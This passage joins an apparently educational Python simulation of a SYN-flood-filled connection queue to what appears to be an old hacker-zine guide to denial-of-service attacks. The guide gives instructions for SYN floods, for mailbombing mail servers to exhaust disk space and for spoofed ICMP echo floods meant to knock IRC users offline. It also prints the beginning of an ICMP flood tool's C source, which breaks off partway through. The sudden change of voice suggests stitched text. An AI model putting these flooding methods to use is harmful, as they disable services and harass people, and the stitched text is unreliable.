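        return True

    def on_ack(self, src, now):
        """Third leg from a real client: connection established, slot released."""
        if self.pending.pop(src, None) is None:
            return False
        self.completed += 1
        return True

    def on_rst(self, src, now):
        """A reachable host that never sent the SYN answers the stray SYN/ACK with
        RST, which releases the slot immediately."""
        return self.pending.pop(src, None) is not None


def flood_scenario(capacity=8, timeout=75):
    """Spoofed SYNs from unreachable sources fill the queue; a real client is
    refused until the entries time out."""
    q = HalfOpenQueue(capacity, timeout)
    for i in range(capacity):                      # constructed spoofed sources
        q.on_syn(("10.0.0.%d" % i, 40000 + i), now=0)
    legit = ("192.0.2.10", 51234)                  # constructed real client
    refused = not q.on_syn(legit, now=1)
    accepted = q.on_syn(legit, now=timeout)        # stale entries expired first
    q.on_ack(legit, now=timeout + 1)
    return {"refused_while_flooded": refused, "accepted_after_timeout": accepted,
            "dropped": q.dropped, "completed": q.completed, "pending": len(q.pending)}


def reachable_source_scenario(capacity=8, timeout=75):
    """Same SYNs, but the spoofed hosts exist: each answers the unexpected SYN/ACK
    with RST, so the slots free at once and the real client gets in."""
    q = HalfOpenQueue(capacity, timeout)
    sources = [("10.0.0.%d" % i, 40000 + i) for i in range(capacity)]
    for s in sources:
        q.on_syn(s, now=0)
    for s in sources:
        q.on_rst(s, now=1)
    return q.on_syn(("192.0.2.10", 51234), now=2)


if __name__ == "__main__":
    print("unreachable sources:", flood_scenario())
    print("reachable sources let the client in:", reachable_source_scenario())
```

The two knobs the model exposes, queue capacity and timeout, are exactly what the later defences tune: a bigger backlog and a shorter SYN/ACK retry period make the window smaller, and SYN cookies remove the per-entry state altogether.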
So if you send several SYNs to a host's port that you want to block, you can quickly fill up the queue, making the port dead, since it can handle no more connections. For code that does this, see phrack 48.

--------------------
SMTP floods:
--------------------

These are very simple to do, since SMTP servers will pretty much accept just about anything that comes their way. I did a simple mailbomber in issue 7, so use that to mailbomb a server: try common accounts like postmaster@site or info@site, etc., and send the system either several VERY large files to fill up disk space, or many, many small mails to flood the SMTP server with e-mails, thus making it unusable.

-----------------------------
ICMP_ECHO floods:
-----------------------------

These attacks are some of the most common, since they are often used by IRC users to 'kill' other users, and thus many people I know are getting k-lines and nasty messages from sysadmins who are pissed that someone from Undernet or another IRC server has e-mailed them about you. Anyway, below is some sample code that Keystroke had, and although he will be pissed that I am adding it here, I am, so tough shit Key! (heh) This code may also be the basis of my ICMP killer Win95 program I will be developing during the coming months (wish me luck on porting this from UNIX to Win95). Basically the following code works since UNIX systems will reply to ICMP requests continually, not realizing that it may be halting the system by replying to what the system thinks are simple ICMPs. Now, adding an IP spoofer to this setup only makes things better, since the computer will time out while trying to get a reply from these ECHOs while new ECHOs are also hitting the system, thus totally killing the system.

-------------------------------------------
/*
 * echok.c
 * ICMP_ECHO Killer
 *
 * Author: Zakath   Credits: LOTSA thanks to crisk
 * Don't be fooled. Very little is my orig code.
 * [03.13.96]
 */

#define RESOLVE_QUIET
#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define ECHOK_VER "1.4"

/* GENERAL ROUTINES ------------------------------------------- */

void banner(void)
{
    printf("\n * ICMP ECHO Killer [v%s] - by Zakath *", ECHOK_VER);
    printf("\n * Code based on works by Crisk & Mike Muuss *\n\n");
}

void usage(const char *progname)
{
    printf("\nusage:\n ");
    printf("%s [-f <-n number>] [-s packet size] [-w wait] \n\n", progname);
    printf("\t-f : enable flooding (ping -f)\n");
    printf("\t-n : number of pings to send\n");
    printf("\t-s : ICMP_ECHO Packet Size [Default is 64]\n");
    printf("\t-w